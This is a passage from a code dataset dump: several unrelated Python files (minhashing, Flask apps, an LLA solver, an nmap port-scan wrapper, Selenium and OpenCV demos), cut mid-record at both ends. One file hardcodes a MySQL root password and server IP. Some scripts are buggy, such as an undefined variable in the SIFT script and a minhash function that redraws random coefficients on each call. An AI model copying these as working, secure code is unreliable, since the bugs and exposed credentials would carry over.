\"/\")\r\n mailfile = sys.argv[1]\r\n frame = MailViewFrame(None, rundir, 'zhaowei', mailfile) \r\n frame.Show(True)\r\n self.SetTopWindow(frame)\r\n \r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n app = TestApp()\r\n app.MainLoop()\r\n \r\n \r\n","sub_path":"cute/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99210406","text":"\"\"\"\r\nIn this we calculate the signature of each document using minhashing \r\ntechnique by utilizing a number of hash functions\r\n\"\"\"\r\n\r\nfrom random import randint\r\nfrom pandas import DataFrame, read_pickle\r\nimport numpy as np\r\nimport os\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef gen_hash_func(rows, no_of_hash_functions=200):\r\n \"\"\"This function creates parameters for given no of hash functions\r\n\r\n Parameters\r\n ----------\r\n rows: Number of rows in shingle matrix (int)\r\n no_of_hash_functions: Number of hash functions to generate for minhashing (Default: 200)\r\n\r\n Returns\r\n -------\r\n list : list of functions which can be used as hashes[i](x)\r\n \"\"\"\r\n\r\n hashes = []\r\n c = rows\r\n\r\n for i in range(no_of_hash_functions):\r\n def hash(x):\r\n \"\"\"\r\n This function calculates hash for given x\r\n hash function format: (a*x+b)%c where\r\n c: prime integer just greater than rows\r\n a,b: random integer less than c\r\n \"\"\"\r\n return (randint(1, 5*c)*x + randint(1, 5*c)) % c\r\n hashes.append(hash)\r\n\r\n return hashes\r\n\r\n\r\ndef generate_signature_matrix(inci_mat, no_of_hash_functions=200):\r\n \"\"\"It generates the signature matrix for whole corpus\r\n\r\n Parameters\r\n ----------\r\n inci_mat: incidence index generated after shingling of similar process(pandas.DataFrame)\r\n no_of_hash_functions: numner of hash functions to be used in generating signatures for documents.(Default: 100)\r\n\r\n Returns\r\n -------\r\n returns dataframe containing signatures of every document\r\n \"\"\"\r\n\r\n # if pickle file exists, load and return it\r\n if os.path.exists(\"sig_mat.pickle\"):\r\n signature_matrix = read_pickle(\"sig_mat.pickle\")\r\n print(\"Using already created sig_mat.pickle file\")\r\n return signature_matrix\r\n\r\n rows, cols = inci_mat.shape\r\n hashes = gen_hash_func(rows, no_of_hash_functions)\r\n signature_matrix = DataFrame(index=[i for i in range(\r\n no_of_hash_functions)], columns=inci_mat.columns)\r\n\r\n # core minhashing algorithm\r\n for i in tqdm(range(rows)):\r\n for j in inci_mat.columns:\r\n if inci_mat.iat[i, j] == 1:\r\n for k in range(no_of_hash_functions):\r\n if np.isnan(signature_matrix.iat[k, j]):\r\n signature_matrix.iat[k, j] = hashes[k](i)\r\n else:\r\n signature_matrix.iat[k, j] = min(\r\n signature_matrix.iat[k, j], hashes[k](i))\r\n\r\n print(\"Saving generated signature_matrix to pickle file...\")\r\n signature_matrix.to_pickle(\"sig_mat.pickle\")\r\n print(\"Saved to sig_mat.pickle\")\r\n return signature_matrix\r\n","sub_path":"Code/minhashing.py","file_name":"minhashing.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310766879","text":"import os\nimport urllib.request\nimport time\nfrom urllib.parse import quote\nfrom TRS_backend.FeatureExtraction.ImageFeatureExtraction.Canny_detection import canny_detection\nfrom TRS_backend.FeatureExtraction.ImageFeatureExtraction.Widget_Recognition import widget_recognition\n\n\ndef download_img(image_url):\n timestamp = str(int(time.time()))\n curpath = os.path.dirname(os.path.realpath(__file__))\n file_path = curpath + '\\\\images\\\\' + timestamp + image_url[len(image_url) - 4:]\n try:\n urllib.request.urlretrieve(quote(image_url, safe='/:?='),\n filename=file_path) # 利用urllib.request.urltrieve方法下载图片\n return timestamp + os.path.splitext(image_url)[1]\n except IOError as e:\n print(1, e)\n except Exception as e:\n print(2, e)\n\n\ndef image_feature_extraction(image_url_list, widget_information_list):\n image_name_list = []\n for image_url in image_url_list:\n img_name = download_img(image_url)\n image_name_list.append(img_name)\n canny_detection(img_name)\n time.sleep(1)\n result_list = widget_recognition(image_name_list, widget_information_list)\n return result_list\n","sub_path":"TRS_backend/FeatureExtraction/ImageFeatureExtraction/image_feature_extraction.py","file_name":"image_feature_extraction.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552646078","text":"\"\"\"\nPalindrome Partitioning\nGiven a string s, partition s such that every substring of the partition is a palindrome. Return all possible palindrome partitioning of s.\n\nA palindrome string is a string that reads the same backward as forward.\n\n\n\nExample 1:\n\nInput: s = \"aab\"\nOutput: [[\"a\",\"a\",\"b\"],[\"aa\",\"b\"]]\nExample 2:\n\nInput: s = \"a\"\nOutput: [[\"a\"]]\n\n\nConstraints:\n\n1 <= s.length <= 16\ns contains only lowercase English letters.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def dfs(self, s, partition, result):\n if not s:\n ## base case aka stop condition\n # add into result when we meet a empty string\n result.append(partition[::])\n return\n ## general cases:\n # scan each possible split index\n\n for i in range(1, len(s) + 1):\n\n prefix, postfix = s[:i], s[i:]\n\n if self.is_palindrome(prefix):\n # current prefix is palindrome, keep trying to make more partition in DFS\n partition.append(prefix)\n self.dfs(postfix, partition, result)\n partition.pop()\n\n def is_palindrome(self, s):\n\n # helper function to chceck palindrome\n return s == s[::-1]\n\n def partition(self, s: str) -> List[List[str]]:\n # Solution 1 - 660 ms\n \"\"\"\n # record for solution\n result = []\n\n # make palindrome partition in DFS\n self.dfs(s, [], result)\n return result\n \"\"\"\n # Solution 2 - 44 ms\n if not s:\n return []\n dp = {0: [[]], 1: [[s[0]]]}\n for i in range(1, len(s)):\n dp[i + 1] = []\n for j in range(0, i + 1):\n if self.is_palindrome(s[j:i + 1]):\n for prev in dp[j]:\n dp[i + 1].append(prev + [s[j:i + 1]])\n return dp[len(s)]\n\n\n# Main Call\ns = \"aab\"\nsolution = Solution()\nprint(solution.partition(s))\n","sub_path":"src/matrix/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"43969114","text":"\n\ndef canonize(source):\n stop_symbols = '@#$%\".,!?:;-\\n\\r()—1234567890\\'*'\n\n stop_words = (u'это', u'как', u'так',\n u'и', u'в', u'над',\n u'к', u'до', u'не',\n u'на', u'но', u'за',\n u'то', u'с', u'ли',\n u'а', u'во', u'от',\n u'со', u'для', u'о',\n u'же', u'ну', u'вы',\n u'бы', u'что', u'кто',\n u'он', u'она', u'у', u'из',\n u'это', u'эту', u'эта')\n\n return ([x for x in [y.strip(stop_symbols) for y in source.lower().split()] if x and (x not in stop_words)])\n\ndef genshingle(source, shingleLen=4):\n import binascii\n if len(source) < shingleLen:\n source += [\"any\"] * (shingleLen - len(source))\n out = []\n for i in range(len(source)-(shingleLen-1)):\n out.append(binascii.crc32(' '.join( [x for x in source[i:i+shingleLen]]).encode('utf-8')))\n if len(out) == 0:\n pass\n return out\n\ndef compare (source1,source2):\n same = 0\n for i in range(len(source1)):\n if source1[i] in source2:\n same = same + 1\n return same*2/float(len(source1) + len(source2))*100\n\n\ndef compareText(text1, text2):\n k = 2 # Will assume if lengthes of texts after canonization differ mor then k times then\n # texts are different\n x1 = canonize(text1)\n x2 = canonize(text2)\n if len(x1) > k * len(x2) or len(x2) > k * len(x1):\n return False\n shinglelen = min(4, len(x1), len(x2))\n return compare(genshingle(x1, shinglelen), genshingle(x2, shinglelen)) > 0\n\nif __name__ == '__main__':\n file1 = \"text1.txt\"\n encod = \"cp1251\"\n with open(file1, encoding=encod) as txt1:\n try:\n ttt1 = txt1.read()\n except UnicodeDecodeError as e:\n print(e.encoding)\n print(e.reason)\n print(e.object)\n print(e.start)\n print(e.end)\n\n\n file2 = \"text3.txt\"\n with open(file2, encoding=encod) as txt2:\n ttt2 = txt2.read()\n\n x1 = canonize(ttt1)\n x2 = canonize(ttt2)\n y1 = genshingle(x1,3)\n y2 = genshingle(x2,3)\n print(x1, x2)\n print(y1, y2)\n print(compare(x1, x2))\n print(compare(y1,y2))\n\n\n","sub_path":"difftexts.py","file_name":"difftexts.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172835475","text":"import flask\nimport scrabble\nfrom flask import Flask, flash, redirect, render_template, \\\nrequest, url_for\n\n\napp = flask.Flask(__name__)\napp.secret_key = 'bacon'\n\n\n\n\n# Routes\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n scrabble.scrabble_output(request)\n\n return flask.render_template('index.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return flask.render_template('404.html'), 404\n\napp.debug = True\napp.run()\n\n\n# import pdb; pdb.set_trace()","sub_path":"scrabble_app/scrabble_app.py","file_name":"scrabble_app.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622337958","text":"from copy import deepcopy\nfrom time import time\n\nfrom yaglm.opt.stopping import check_decreasing_loss, check_no_change\nfrom yaglm.opt.utils import safe_concat\n\n\ndef solve_lla(sub_prob, penalty_func,\n init, init_upv=None,\n sp_init=None, sp_upv_init=None, sp_other_data=None,\n transform=abs, objective=None,\n n_steps=1, xtol=1e-4, atol=None, rtol=None,\n tracking_level=1, verbosity=0):\n \"\"\"\n Runs the local linear approximation algorithm. We only need the concave penalty function and a subroutine that solves the weighted Lasso-like subproblems.\n\n Parameters\n ----------\n sub_prob:\n An object that solves the weighted subproblems.\n\n penalty_func: fclsp.penalty.FoldedPenalty\n The penalty function applied to the possibly transformed values.\n\n init: array-like\n The value at which to initalize the LLA algorithm.\n\n init_upv: None, array-like\n The value at which to initialize the (optional) unpenalized variable.\n\n sp_init: None, array-like\n (Optional) Value at which to initialize the first weighted subproblem.\n\n sp_upv_init: None, array-like\n (Optional) Value at which to initialize the first weighted subproblem for the unpenalized variable.\n\n sp_other_data: None\n (Optional) Value at which to initialize the other subproblem data.\n\n transform: callable\n Transforms the penalized variable into the object whom we apply the concave penalty to.\n\n objective: None, callable(value, upv) -> float\n (Optinoal) Evaluates the full objective function.\n\n n_steps: int\n Number of LLA steps to take.\n\n xtol: float, None\n The change in x tolerance stopping criterion based on the L_infy norm.\n\n atol: float, None\n Absolute tolerance for loss based stopping criterion.\n\n rtol: float, None\n Relative tolerance for loss based stopping criterion.\n\n tracking_level: int\n How much optimization data to store at each step. Lower values means less informationed is stored.\n\n verbosity: int\n How much information to print out. Lower values means less print out.\n\n Output\n ------\n solution, solution_upv, sp_other_data, opt_info\n\n solution: array-like\n The solution of the penalized variable.\n\n solution_upv: None, array-like\n The solution of the unpenalized variable.\n\n sp_other_data:\n Other data output by the subproblem solver.\n\n opt_info: dict\n Data tracked during the optimization procedure e.g. the loss function.\n\n\n References\n ----------\n Fan, J., Xue, L. and Zou, H., 2014. Strong oracle optimality of folded concave penalized estimation. Annals of statistics, 42(3), p.819.\n \"\"\"\n\n ######################\n # format initializer #\n ######################\n\n current = deepcopy(init)\n current_upv = deepcopy(init_upv)\n T = transform(current)\n\n if xtol is not None:\n if current_upv is not None:\n prev = deepcopy(safe_concat(current, current_upv))\n else:\n prev = deepcopy(current)\n\n ##############################\n # optimization data tracking #\n ##############################\n opt_info = {}\n\n if (atol is not None or rtol is not None) and tracking_level == 0:\n tracking_level = 1\n\n if tracking_level >= 1:\n if objective is None:\n raise ValueError(\"The objective function must be provided\")\n\n opt_info['obj'] = [objective(value=current, upv=current_upv)]\n\n if tracking_level >= 2:\n if xtol is not None:\n opt_info['diff_norm'] = [] # difference between successive iterates\n\n #################\n # Run algorithm #\n #################\n\n start_time = time()\n\n step = 0 # in case n_steps = 0\n x_stop = False\n obj_stop = False\n for step in range(int(n_steps)):\n\n if verbosity >= 1:\n print(\"Step {}, {:1.2f} seconds after start\".\n format(step + 1, time() - start_time))\n\n ###############\n # Make update #\n ###############\n\n # setup initialization for subproblem solver\n if sp_init is None:\n sp_init = current\n\n if sp_upv_init is None:\n sp_upv_init = current_upv\n\n # majorize concave penalty\n # T has already been computed as T = transform(current)\n weights = penalty_func.grad(T)\n\n # solve weighted Lasso problem\n current, current_upv, sp_other_data = \\\n sub_prob.solve(weights=weights,\n sp_init=sp_init,\n sp_upv_init=sp_upv_init,\n sp_other_data=sp_other_data)\n\n ############################################\n # check stopping conditions and track data #\n ############################################\n\n T = None # tells us to compute T below\n\n # track objective function data\n if tracking_level >= 1:\n opt_info['obj'].append(objective(value=current, upv=current_upv))\n\n # x change criteria\n if xtol is not None:\n if current_upv is not None:\n _current = safe_concat(current, current_upv)\n else:\n _current = current\n\n x_stop, diff_norm = check_no_change(current=_current,\n prev=prev,\n tol=xtol,\n norm='max')\n\n if tracking_level >= 2:\n opt_info['diff_norm'].append(diff_norm)\n\n if tracking_level >= 1:\n # objective function change criterion\n # if the objective has stopped decreasing we are done!\n obj_stop = check_decreasing_loss(current_loss=opt_info['obj'][-1],\n prev_loss=opt_info['obj'][-2],\n abs_tol=atol, rel_tol=rtol,\n on_increase='ignore')\n\n # maybe stop the algorithm\n if x_stop or obj_stop:\n break\n elif xtol is not None:\n\n # set prev for next interation\n if current_upv is not None:\n prev = deepcopy(safe_concat(current, current_upv))\n else:\n prev = deepcopy(current)\n\n # compute transform for next iteration if it has not already\n # been computed\n if T is None:\n T = transform(current)\n\n opt_info['runtime'] = time() - start_time\n opt_info['final_step'] = step\n opt_info['obj_stop'] = obj_stop\n opt_info['x_stop'] = x_stop\n\n return current, current_upv, sp_other_data, opt_info\n\n\nclass WeightedProblemSolver(object):\n\n def solve(self, weights, sp_init=None,\n sp_upv_init=None, other_data=None):\n \"\"\"\n Solves the weighted subproblem.\n\n Parameters\n ----------\n weights: array-like\n Weights for the weighted sup-problem.\n\n sp_init: None, array-like\n (Optional) Subproblem initialization for the penalized variable.\n\n sp_upv_init: None, array-like\n (Optional) Subproblem initialization for the unpenalized variable.\n\n other_data\n (Optional) Subproblem initialization for other data e.g. dual variables.\n\n Output\n ------\n solution, upv_solution, other_data\n \"\"\"\n raise NotImplementedError\n","sub_path":"yaglm/opt/lla.py","file_name":"lla.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519001038","text":"#%%\nimport os\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# img1 = cv2.imread('box.png',0) # queryImage\n# img2 = cv2.imread('box_in_scene.png',0) # trainImage\n\nData_Set_dir = (os.path.dirname(os.path.realpath(__file__)))\n\nimg1 = cv2.imread(os.path.join(Data_Set_dir,'box.png'))\nimg2 = cv2.imread(os.path.join(Data_Set_dir,'box_in.png'))\n\ngray = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n\n#%%\n\n# SIFT 객체를 생성한다.\n\nsift = cv2.xfeatures2d.SIFT_create()\n\n# 이미지에서 키포인트들을 계산하고 추출함.\n#cv2.SURF.detect(image[, mask]) → keypoints\nkp = sift.detect(gray,None)\n\n#%%\n\n# 위에서 얻은 키포인트들을 그려준다.\nimg_1 = cv2.drawKeypoints(gray, kp, img1)\nimg_2 = cv2.drawKeypoints(gray, kp, img2, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n#%%\n\nplt.imshow(img_1)\nplt.imshow(img_2)\n\n#%%\n# \n\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1 = sift.detect(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n#%%\n# FLANN parameters\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50) # or pass empty dictionary\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\n\nmatches = flann.knnMatch(des1,des2,k=2)\n\n#%%\n# Need to draw only good matches, so create a mask\nmatchesMask = [[0,0] for i in xrange(len(matches))]\n\n#%%\n# ratio test as per Lowe's paper\nfor i,(m,n) in enumerate(matches):\n if m.distance < 0.7*n.distance:\n matchesMask[i]=[1,0]\n\ndraw_params = dict(matchColor = (0,255,0),\n singlePointColor = (255,0,0),\n matchesMask = matchesMask,\n flags = 0)\n\n#%%\nimg3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,matches,None,**draw_params)\n\n#%%\nplt.imshow(img3,),plt.show()\n\n# %%\n","sub_path":"SIFT_b.py","file_name":"SIFT_b.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123975729","text":"# file_search.py 11Aug2021 crs, from read_file_try.py\r\n\r\n\"\"\"\r\nSimple file search/scan similar to simple UNIX/Linux grep\r\n 1. Loop over files/strings\r\n\"\"\"\r\nprev_name = \"REQUIRED\"\r\nprev_search_string = \"REQUIRED\"\r\nwhile True:\r\n file_name = input(f\"Enter File Name [{prev_name}]:\")\r\n if file_name == \"\":\r\n file_name = prev_name\r\n if file_name == \"REQUIRED\":\r\n continue # Try again\r\n \r\n prev_name = file_name # Remember as default\r\n search_string = input(f\"Enter search string[{prev_search_string}]:\")\r\n if search_string == \"\":\r\n search_string = prev_search_string\r\n if search_string == \"REQUIRED\": # What if we want to search\r\n # for \"REQUIRED\" ?\r\n continue # Ignore empty search string\r\n prev_search_string = search_string\r\n \r\n try:\r\n with open(file_name) as finp:\r\n for lineno, line in enumerate(finp, start=1):\r\n if line.find(search_string) > -1:\r\n print(f\"{lineno:3}: {line}\", end=\"\")\r\n except IOError as e:\r\n print(f\"Something wrong happened in file {file_name} {e}\")\r\n\r\nr'''\r\n= RESTART: C:/Users/raysm/workspace/python/\r\nIntroductionToProgramming/presentation/Class_5_Files\r\n/homework/solutions/file_search.py\r\nEnter File Name [REQUIRED]:file_search.py\r\nEnter search string[REQUIRED]:while\r\n 9: while True:\r\nEnter File Name [file_search.py]:\r\nEnter search string[while]:if\r\n 11: if file_name == \"\":\r\n 13: if file_name == \"REQUIRED\":\r\n 18: if search_string == \"\":\r\n 20: if search_string == \"REQUIRED\": # What if we want to search\r\n 28: if line.find(search_string) > -1:\r\nEnter File Name [file_search.py]:../../../../exercises/files/read_file_try.py\r\nEnter search string[if]:try\r\n 1: # read_file_try.py 15Oct2018\r\n 4: with try/except to catch and report errors\r\n 8: try:\r\nEnter File Name [../../../../exercises/files/read_file_try.py]:\r\n\r\n'''\r\n","sub_path":"presentation/Class_7_Graphics/homework/solutions/file_search.py","file_name":"file_search.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462392375","text":"'''Stores common objects for api.'''\nimport os\nfrom flask import Flask\nfrom persistence import trips_models\n\ndef create_flask_app():\n '''Creates a configured flask app.'''\n app = Flask(__name__, template_folder='templates')\n app.debug = True\n app.secret_key = 'secret'\n app.config['DEBUG'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = _get_db_url()\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n trips_models.db.init_app(app)\n\n return app\n\n\ndef _get_db_url():\n if (os.getenv('SERVER_SOFTWARE') and\n os.getenv('SERVER_SOFTWARE').startswith('Google App Engine/')):\n return 'mysql+gaerdbms:///prod?instance=trekafe:live'\n else:\n #return 'mysql://webapp:webapp@localhost/trekafe'\n return 'mysql://root:Qwerty@1@173.194.243.251/prod'\n","sub_path":"api/app_utils.py","file_name":"app_utils.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259353019","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\ndriver = webdriver.Chrome(executable_path=\"/home/kiran/Downloads/Selenium/chromedriver/chromedriver\")\ndriver.get(\"http://www.google.com/\")\ndriver.implicitly_wait(5)\nprint(driver.title)\ndriver.find_element(By.NAME, \"q\").send_keys(\"naveen automationlabs\")\ntime.sleep(5)\n\noptionslist = driver.find_elements(By.CSS_SELECTOR, \"ul.erkvQe li span\")\n# for id we can use css selector by using #usename --> By.CSS_SELECTOR, \"#username\"\n# for class we can use css selector by using .(Dot)class_name(unique if have many classes\n# for having many classes use css selector by using tag_name.class1.class2.class3\n# xpath we can use for linktest as //a[text()=\"Click Here\"]\n# for going parent to child use XPATh as //div[@id=\"sfi\"]/label for other example //form[div[@id=\"sdi\"]/div[1]/label\n# for going parent to child use CSS SELECTOR div[id=\"dufn\"] label\nfor data in optionslist:\n print(data.text)\n if data.text == 'naveen automationlabs youtube':\n data.click()\n break;\n\ntime.sleep(5)\ndriver.quit()\n\n\n","sub_path":"NaveenAutomation/Webdriverbasics.py","file_name":"Webdriverbasics.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"97116555","text":"\"\"\"A document represents the state of an editing document.\"\"\"\nfrom .selection import Selection, Interval\nfrom .event import Event\nfrom . import commands\nfrom .userinterface import UserInterface\nfrom . import pointer\nfrom .navigation import center_around_selection\n\nimport logging\n\ndocumentlist = []\nactivedocument = None\n\n\nclass Document():\n\n \"\"\"Contains all objects of one file editing document\"\"\"\n OnDocumentInit = Event()\n create_userinterface = None\n _text = ''\n saved = True\n mode = None\n\n expandtab = False\n tabwidth = 4\n autoindent = True\n\n locked_selection = None\n\n def __init__(self, filename=\"\"):\n documentlist.append(self)\n self.OnTextChanged = Event()\n self.OnRead = Event()\n self.OnWrite = Event()\n self.OnQuit = Event()\n self.OnActivate = Event()\n self.OnPrompt = Event()\n\n self.filename = filename\n\n self._selection = Selection(Interval(0, 0))\n self.selectmode = ''\n\n if not self.create_userinterface:\n raise Exception('No function specified in Document.create_userinterface.')\n self.ui = self.create_userinterface(self)\n if not isinstance(self.ui, UserInterface):\n raise Exception('document.ui not an instance of UserInterface.')\n\n # Load the default key map\n from .keymap import default\n self.keymap = {}\n self.keymap.update(default)\n\n self.OnDocumentInit.fire(self)\n\n if filename:\n commands.load(self)\n\n def quit(self):\n \"\"\"Quit document.\"\"\"\n logging.info('Quitting document ' + str(self))\n self.OnQuit.fire(self)\n global activedocument\n index = documentlist.index(self)\n\n # debug(str(documentlist))\n #debug(\"self: \" + str(self.document))\n #debug(\"index: \" + str(index))\n # self.getkey()\n\n if len(documentlist) == 1:\n print('fate - document: close the last document by setting activedoc to None')\n activedocument = None\n return\n\n if index < len(documentlist) - 1:\n nextdocument = documentlist[index + 1]\n else:\n nextdocument = documentlist[index - 1]\n\n nextdocument.activate()\n documentlist.remove(self)\n\n @property\n def text(self):\n return self._text\n\n @text.setter\n def text(self, value):\n self._text = value\n\n self.saved = False\n self.OnTextChanged.fire(self)\n\n def activate(self):\n \"\"\"Activate this document.\"\"\"\n global activedocument\n activedocument = self\n self.OnActivate.fire(self)\n\n @property\n def selection(self):\n return self._selection\n\n @selection.setter\n def selection(self, value):\n # Make sure only valid selections are applied\n assert isinstance(value, Selection)\n value.validate(self)\n self._selection = value\n\n # Update the userinterface viewport to center around first interval\n center_around_selection(self)\n\n def processinput(self, userinput):\n \"\"\"This method is called when this document receives userinput.\"\"\"\n # If the cancel key has been pressed, convert input to Cancel\n if userinput == self.cancelkey:\n userinput = 'Cancel'\n\n logging.debug('Input: ' + str(userinput))\n\n if self.mode:\n # We are not in normalmode\n self.mode.processinput(self, userinput)\n else:\n # We are in normalmode\n if isinstance(userinput, pointer.PointerInput):\n self.process_pointerinput(userinput)\n else:\n if type(userinput) == str:\n key = userinput\n if key in self.keymap:\n command = self.keymap[key]\n else:\n command = None\n else:\n command = userinput\n\n while callable(command):\n command = command(self)\n\n def process_pointerinput(self, userinput):\n assert isinstance(userinput, pointer.PointerInput)\n\n if userinput.length:\n logging.debug('You sweeped from position {} till {}'\n .format(userinput.pos, userinput.pos + userinput.length))\n else:\n logging.debug('You clicked at position ' + str(userinput.pos))\n\n\ndef next_document(document):\n \"\"\"Go to the next document.\"\"\"\n index = documentlist.index(document)\n ndocument = documentlist[(index + 1) % len(documentlist)]\n ndocument.activate()\ncommands.next_document = next_document\n\n\ndef previous_document(document):\n \"\"\"Go to the previous document.\"\"\"\n index = documentlist.index(document)\n ndocument = documentlist[(index - 1) % len(documentlist)]\n ndocument.activate()\ncommands.previous_document = previous_document\n\n\ndef goto_document(index):\n \"\"\"Command constructor to go to the document at given index.\"\"\"\n def wrapper(document):\n documentlist[index].activate()\n return wrapper\n","sub_path":"fate/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195468895","text":"import nmap\n\ndef runScan(ipAddr, portRange, scanVariables):\n results = {}\n\n\n ps = nmap.PortScanner()\n ps.scan(ipAddr, portRange, scanVariables)\n\n hosts = ps.all_hosts()\n for host in hosts:\n ports = []\n currentHost = ps[host]\n hostState = currentHost.state()\n protocols = currentHost.all_protocols()\n if 'tcp' in protocols:\n tcpPorts = currentHost.all_tcp()\n for port in tcpPorts:\n info = currentHost.tcp(port)\n portState = info['state']\n portProtocol = info['name']\n portProduct = info['product']\n productVersion = info['version']\n ports.append({'port': port, 'portInfo': {\n 'state': portState,\n 'protocol': portProtocol,\n 'productVersion': portProduct,\n }})\n\n results[host] = ports\n\n return results\n","sub_path":"Recon/nmapScanner.py","file_name":"nmapScanner.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"601003728","text":"import unittest\nfrom TestUtils import TestChecker\nfrom AST import *\n\nclass CheckSuite(unittest.TestCase):\n def test_400_simple_decl_function(self):\n input = \"\"\"int main() {}\n int main(){}\"\"\"\n expect = \"Redeclared Function: main\"\n self.assertTrue(TestChecker.test(input,expect,400))\n def test_401_simple_decl_function(self):\n input = \"\"\"boolean b;\n int main() {}\n \"\"\"\n expect = \"\"\n self.assertTrue(TestChecker.test(input,expect,401))\n\n ","sub_path":"test/CheckSuite.py","file_name":"CheckSuite.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512447667","text":"import os\nimport numpy as np\nimport xgboost as xgb\n\n_MODEL_PATH = os.path.join('/opt/ml/', 'model') # Path where all your model(s) live in\n\nclass ModelService(object):\n model = None\n\n @classmethod\n def get_model(cls):\n \"\"\"Get the model object for this instance, loading it if it's not already loaded.\"\"\"\n if cls.model is None:\n cls.model = xgb.Booster({'nthread': 4})\n cls.model.load_model(os.path.join(_MODEL_PATH, 'model.joblib'))\n print('Model loaded')\n return cls.model\n\n @classmethod\n def predict(cls, input):\n \"\"\"For the input, do the predictions and return them.\"\"\"\n clf = cls.get_model()\n return clf.predict(input)\n\n\ndef predict(json_input):\n \"\"\"\n Prediction given the request input\n :param json_input: [dict], request input\n :return: [dict], prediction\n \"\"\"\n data = json_input['features']\n print(data)\n data = np.array(data)\n data = xgb.DMatrix(data)\n prediction = ModelService.predict(data)\n print(prediction)\n return {\n \"prediction\": prediction.tolist()\n }\n","sub_path":"sdkv2/ch8/sagify/src/sagify_base/prediction/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"536521003","text":"from flask import Blueprint, jsonify, request\nfrom flask_expects_json import expects_json\nfrom application.custom_logger import log_put_delete_requests, log_post_requests\nfrom application.logic.animal_logic import add_animal, get_all_animals_for_center, update_animal, \\\n delete_animal, get_animal\nfrom application.schemas import post_animal_schema, put_animal_schema\nfrom application.authentification.auth_logic import token_required\n\nanimals = Blueprint('animals', __name__)\n\n\n@animals.route('/animals', methods=['GET'])\n@token_required\ndef get_animals(_center_id):\n # get all the animals related to the center\n\n return jsonify({'animals': get_all_animals_for_center(_center_id)})\n\n\n\n@animals.route('/animals', methods=['POST'])\n@token_required\n@expects_json(post_animal_schema)\ndef post_animal(_center_id):\n # post an animal to the current center animals list\n\n request_data = request.get_json()\n response = add_animal(_center_id, request_data['name'],\n request_data['age'],\n request_data['specie'])\n if response.status_code == 201:\n log_post_requests(request.method, request.url, _center_id,\n request.path, response.json['id'])\n return response\n\n\n@animals.route('/animals/', methods=['GET', 'DELETE'])\n@token_required\ndef get_or_delete_animal(_center_id, animal_id):\n # either get or delete provided animal id\n\n if request.method == 'DELETE':\n response = delete_animal(_center_id, animal_id)\n if response.status_code == 200:\n log_put_delete_requests(request.method, request.url, _center_id, request.path)\n return response\n\n return get_animal(_center_id, animal_id)\n\n\n@animals.route('/animals/', methods=['PUT'])\n@token_required\n@expects_json(put_animal_schema)\ndef put_animal(_center_id, animal_id):\n # changing animal data\n\n request_data = request.get_json()\n new_animal_data = (animal_id, _center_id, request_data['name'], request_data['age'], request_data['specie'])\n response = update_animal(new_animal_data)\n if response.status_code == 200:\n log_put_delete_requests(request.method, request.url, _center_id, request.path)\n return response\n","sub_path":"application/routes/routes_animals.py","file_name":"routes_animals.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"425952935","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\n# %% [markdown]\n# ## Plot Function\n\n# %%\ndef plot(values, policy, goalState, flag, fileName = None, title = None):\n 